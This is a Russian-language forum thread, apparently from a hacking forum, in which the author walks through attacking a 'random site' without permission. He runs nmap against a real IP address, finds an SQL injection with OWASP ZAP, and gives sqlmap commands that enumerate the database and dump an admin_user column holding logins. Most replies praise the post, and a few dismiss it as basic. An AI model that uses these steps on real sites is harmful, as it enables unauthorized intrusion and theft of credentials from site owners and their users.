Загрузка...

Author's article Website scanning for vulnerabilities | kali linux

Thread in Kali Linux created by FuckSad_inactive Jun 22, 2017. 9756 views

  1. FuckSad_inactive
    FuckSad_inactive Topic starter Jun 22, 2017 Banned 382 Apr 1, 2017
    Cканирование Сайтов на уязвимость - значимая часть в жизни пентестера.

    В данной статье мы погворим о взломе определённой цели
    Уязвимость помогает злоумышленникам : Проникновенние в систему&Забрать ценную информацию которая спрятанна от постороних глаз.

    Утилиты Которые будут использованны : Nmap, Owasp-Zap sqlmap. (Все утилиты идут по умолчанию в дистрибутивах - Kali Linux/ParrotOs(Опционально)

    [IMG] [IMG][IMG]

    План действий
    1. Сбор Информации о цели
    2. Поиск Уязвимостей
    3. Инъекция.
    Cканнирование С помощью Nmap

    Я выбрал случайный сайт.



    [IMG]
    В терминале пишем:
    Code
    nmap -A 216.250.120.70
    [IMG]
    nmap - запуск утилиты
    -A - параметр (Глубокое cканирование)
    216.250.120.70 - Ip адресс
    IP адресс можно узнать командой - ping www.^site^.com


    [IMG]


    Cканирование

    Запускаем Owasp-Zap и Bбиваем туда наш сайт.
    Пошло cканирование:)
    (В левом нижнем углу будут расположенны флажочки,они показывают сколько ошибок и их значимость)
    [IMG]
    У меня нашлось одна критическая ошибка - sql injection


    Инъекция
    После того как мы нашли уязвимость мы должны "реализовать" её в зависимости от типа уязвимости.
    Я буду использывать sqlmap
    в терминале пишем:

    Code
    sqlmap -u www.^site^.com^/уязвимость^ --dbs

    После cканированния у нас будет бд
    [IMG]
    Нас интересует information_schema
    Далее пишем в терминале:

    Code
    sqlmap -u www.site.com/exploit -D information_schema --tables

    [IMG]
    Мы получаем таблицы.
    Выбираем
    Нужное нам,я к примеру выбиру tables
    Code
    sqlmap -u http://www.site.com/exploit -D information_schema -T TABLES --columns

    Получаем "Колонны"
    [IMG]
    Ничего тут интересного нету:cry:
    Ноо,закончим начатое дело,Идём дальше.

    Code
    sqlmap -u http://site.com/exploit -D information_schema -T TABLES -C TABLE_NAME --dump
    [IMG]

    И вот тут мы выбираем что нам нужно "сдампить"
    Code

    sqlmap -u http://site.com/exploit -D information_schema -T TABLES -C admin_user --dump[SIZE=4]
    [IMG]

    (ниже логины)
    Всем спасибо за внимание,все притензии/вопросы в лс,флудить не стоит,Всем удачи:)
     
  2. SALCOMP
    SALCOMP Jun 22, 2017 Banned 73 Sep 14, 2016
  3. tiko34
    tiko34 Jun 22, 2017 Banned 9 Jun 15, 2017
    Спс очень информативно мне понравилось)
     
  4. ReemMiz
    ReemMiz Jun 22, 2017 Banned 158 Jan 13, 2017
    годно как раз для учения
     
  5. Azrooh
    Azrooh Jun 22, 2017 507 Feb 28, 2017
    Неплохо
     
  6. renameduser_42470
    renameduser_42470 Jun 22, 2017 Banned 373 Jul 4, 2016
    Как всегда, топ человек - топ темы)
     
  7. Fend
    Fend Jun 22, 2017 Закрылись На Замок
    годнота
     
  8. Begin_inactive93067
    Begin_inactive93067 Jun 22, 2017 Banned 133 Mar 11, 2017
    Прям хацкером себя почувствовал
     
  9. UCHIHA_inactive80274
    Годно
     
  10. Alexkuz2014
    Alexkuz2014 Jun 22, 2017 Потерявший всех.. 240 Mar 27, 2017
    Ничего не понял, симпу влепил... впервые...
     
  11. divinity
    divinity Jun 22, 2017 สสสส 169 Feb 23, 2017
    хоть и рассказывает очевидные для меня вещи(дайте повыебываться),но очень годно.Дайте аффтарскую челу-заслужил
     
  12. divinity
    divinity Jun 22, 2017 สสสส 169 Feb 23, 2017
  13. ИмитацияСчастья
    ИмитацияСчастья Jun 22, 2017 они будут плакать, когда увидят тело 3080 Jun 22, 2016
    крута давно хотел научится этой залупе
     
  14. renameduser_96207
    Ебаный врот, это же шедевр
     
  15. FuckSad_inactive
    FuckSad_inactive Topic starter Jun 26, 2017 Banned 382 Apr 1, 2017
    пруф
     
  16. GhellikKusss
    GhellikKusss Aug 27, 2017 1602 Mar 15, 2017
    Солидно!!
     
  17. Jajadc444
    Jajadc444 Aug 30, 2017 Banned 0 Aug 25, 2017
    Basic guide
     
  18. DartDeth
    DartDeth Sep 8, 2017 ЖИРНЫЕ БЛИНЫ 22 Oct 24, 2016
    то, что ты запустил nmap - это ещё не сканирование сайта на уязвимость
    ты написал статью, где ты просто достал обычную инфу о сайте, а потом древним методом (кстати говоря, как и на остальных форумах), написал как правильно нужно дампить бд с нубо-сайтов, это может сделать каждый...
     
  19. Brom93
    Brom93 Sep 10, 2017 Banned 1 Sep 9, 2017
    Немного не понял логику, что из сканирования nmapom повляло на твое решение просканировать сайт овасп-запом, вернее для чего в данном случае сбор информации был вообще?
     
  20. Tobi_kun
    Tobi_kun Jun 27, 2018 Banned 0 Jun 27, 2018
    Просто показал что типа хацкер, смог запустить без надобности nmap.
     
Loading...
Top